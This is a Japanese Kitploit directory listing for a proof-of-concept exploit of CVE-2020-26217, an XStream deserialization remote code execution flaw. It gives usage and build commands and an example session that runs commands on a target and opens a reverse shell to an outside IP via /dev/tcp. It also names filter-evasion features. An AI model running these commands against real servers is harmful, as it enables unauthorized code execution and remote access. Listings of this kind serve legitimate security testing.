Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2020-26217-XStream — CVE-2020-26217 XStreamデシリアライゼーションのPoC | Kitploit
ツール/GitHubGitHub/kairo-one/cve-2020-26217-xstream
ペイロード生成脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストコマンド&コントロール
GitHubkairo-one/cve-2020-26217-xstream

CVE-2020-26217-XStream

CVE-2020-26217 XStreamデシリアライゼーションのPoC

リポジトリを見る
29ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2020-26217 XStream RCE Exploit

XStream リモートコード実行脆弱性悪用ツール。

脆弱性の説明

CVE-2020-26217 は、XStream ライブラリにおける逆シリアル化の脆弱性であり、攻撃者は悪意のある XML データを構築することでリモートコード実行を引き起こす可能性があります。

影響を受けるバージョン:XStream <= 1.4.13

使用方法

root@kitploit:~
go run poc.go <目標URL>

例

root@kitploit:~
# ツールの実行
go run poc.go http://target.com:8080/?data

# インタラクティブモードに入ったらコマンドを入力
cmd> whoami
cmd> cat /flag
cmd> bash -i >& /dev/tcp/192.168.1.100/4444 0>&1
cmd> exit

機能特徴

  • 対話型コマンド実行
  • URLパラメータ名の自動解析
  • Base64エンコードによる特殊文字フィルターの回避
  • HTTPS対応(証明書検証をスキップ)

コンパイル

root@kitploit:~
go build -o poc poc.go

免責事項

本ツールはセキュリティ研究および許可されたテスト専用であり、不正使用はご遠慮ください。使用者は関連する法的責任を自ら負うものとします。

ツールをダウンロード